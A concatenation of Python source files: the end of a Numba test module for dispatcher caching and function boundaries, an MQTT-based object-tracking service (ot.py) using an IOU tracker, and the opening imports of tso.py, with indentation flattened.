if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=utils.StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_get_annotation_info(self):
@jit
def foo(a):
return a + 1
foo(1)
foo(1.3)
expected = dict(chain.from_iterable(foo.get_annotation_info(i).items()
for i in foo.signatures))
result = foo.get_annotation_info()
self.assertEqual(expected, result)
def test_issue_with_array_layout_conflict(self):
"""
This test an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguous first but the compiler checks
for C contiguous first. This results in an C contiguous code inserted
as F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: "
"stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
@tag('important')
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted loops', str(w[0].message))
def test_big_array(self):
# Code references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Function with the same names should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
# Make sure we can spawn new process without inheriting
# the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
def test_caching_mutliple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
# Test that a Dispatcher object can be pass as argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_cannot_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
with self.assertRaises(TypeError) as raises:
foo(fn)
self.assertRegexpMatches(str(raises.exception),
"cannot convert native .* to Python object")
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
# much longer than of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
if __name__ == '__main__':
unittest.main()
|
ot.py
|
#!/usr/bin/python3
import traceback
import paho.mqtt.client as mqtt
from threading import Thread, Condition, Timer
from signal import signal, SIGTERM
from configuration import env
import json
import time
import datetime
import sys
import struct
from iou_tracker import IOUTracker
from utils import BBUtil
mqtthost = env["MQTTHOST"]
office = list(map(float, env["OFFICE"].split(",")))
mqtt_topic = env["MQTT_TOPIC"]
class OT(object):
def __init__(self):
super(OT, self).__init__()
self._cache_rec = []
self._cache_send = []
self._cond_rec = Condition()
self._cond_send = Condition()
self._last_ts = None
self._speed_total=0
self._nframes=0
self._max_speed=0
self._mqtt = mqtt.Client()
self._mqtt.on_message = self.on_message
self._mqtt.on_disconnect = self.on_disconnect
self._topic_last_ts=0
self._tracker={}
def loop(self, topic=mqtt_topic):
print("connecting mqtt", flush=True)
timer = Timer(10, self._connect_watchdog)
timer.start()
while True:
try:
self._mqtt.connect(mqtthost)
break
except:
print(traceback.format_exc(), flush=True)
timer.cancel()
print("mqtt connected", flush=True)
self._stop = False
Thread(target=self.process).start()
Thread(target=self.publish).start()
self._mqtt.subscribe(topic)
self._mqtt.loop_forever()
def _connect_watchdog(self):
print("quit due to mqtt timeout", flush=True)
exit(-1)
def _add_rec(self, item=None):
self._cond_rec.acquire()
if item:
self._cache_rec.append(item)
self._cond_rec.notify()
self._cond_rec.release()
def _add_send(self, item=None):
self._cond_send.acquire()
if item:
self._cache_send.append(item)
self._cond_send.notify()
self._cond_send.release()
def stop(self):
self._mqtt.disconnect()
def on_disconnect(self, client, userdata, rc):
self._stop = True
def on_message(self, client, userdata, message):
try:
topic = message.topic
now=time.time()
self._add_rec(message.payload)
delta=int((now - self._topic_last_ts)*1000)
#print("MQTT on message: " +topic, delta, int((time.time()-now)*1000), flush=True)
self._topic_last_ts=now
except:
print(traceback.format_exc(), flush=True)
def _tracking(self,payload):
metadata = json.loads(payload.decode("utf-8"))
sensor=metadata["tags"]["sensor"]
if sensor not in self._tracker:
self._tracker[sensor]=IOUTracker(sigma_l=0,sigma_h=0.5,sigma_iou=0.5,t_min=2)
tracker=self._tracker[sensor]
width = metadata["resolution"]["width"]
height = metadata["resolution"]["height"]
bbutil=BBUtil(width, height)
objects=metadata["objects"]
bboxs=[]
confidence=[]
object_type=[]
detections=[]
for _idx in range(len(objects)):
bbox=objects[_idx]["detection"]["bounding_box"]
bbox=[bbox["x_min"],bbox["y_min"],bbox["x_max"],bbox["y_max"]]
bboxs=bbutil.float_to_int(bbox)
detections += [{
"bbox":bbox,
"confidence": objects[_idx]["detection"]["confidence"],
"object_type": objects[_idx]["detection"]["label_id"],
"idx": _idx,
}]
results=[]
t=time.time()
results=tracker.track(detections)
#print("mot: ",int((time.time()-t)*1000),sensor,flush=True)
if len(results) == 0: return
for item in results:
objects[item["idx"]]["track_id"]=item["track_id"]
metadata["objects"]=[objects[item["idx"]] for item in results]
metadata["nobjects"]=len(results)
self._add_send(metadata)
def process(self):
while not self._stop:
self._cond_rec.acquire()
self._cond_rec.wait()
bulk = self._cache_rec
self._cache_rec = []
self._cond_rec.release()
try:
for idx,item in enumerate(bulk):
t=time.time()
self._tracking(item)
except:
print(traceback.format_exc(), flush=True)
continue
def publish(self):
while not self._stop:
self._cond_send.acquire()
self._cond_send.wait()
bulk = self._cache_send
self._cache_send = []
self._cond_send.release()
topic="analytics"
try:
for idx in range(len(bulk)):
t=time.time()
data = json.dumps(bulk[idx])
self._mqtt.publish(topic,payload=data,qos=0)
pass
except:
print(traceback.format_exc(), flush=True)
continue
ot = OT()
def quit_service(signum, sigframe):
ot.stop()
signal(SIGTERM, quit_service)
ot.loop()
|
tso.py
|
import argparse
import threading
from subprocess import Popen, PIPE
from typing import List
